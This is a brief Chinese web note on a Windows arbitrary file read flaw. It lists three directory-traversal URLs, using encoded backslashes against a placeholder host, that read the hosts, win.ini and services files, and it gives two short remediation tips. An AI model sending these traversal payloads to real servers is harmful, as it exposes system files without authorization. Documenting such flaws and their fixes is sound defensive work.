win系统任意文件读取漏洞

https://XXX.XXX.XXX//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/System32/drivers/etc/hosts

https://XXX.XXX.XXX//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini

https://XXX.XXX.XXX//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/System32/drivers/etc/services

修复建议:1、中间件配置不允许夸目录读取

2、配置web权限

你可能感兴趣的:(win系统任意文件读取漏洞)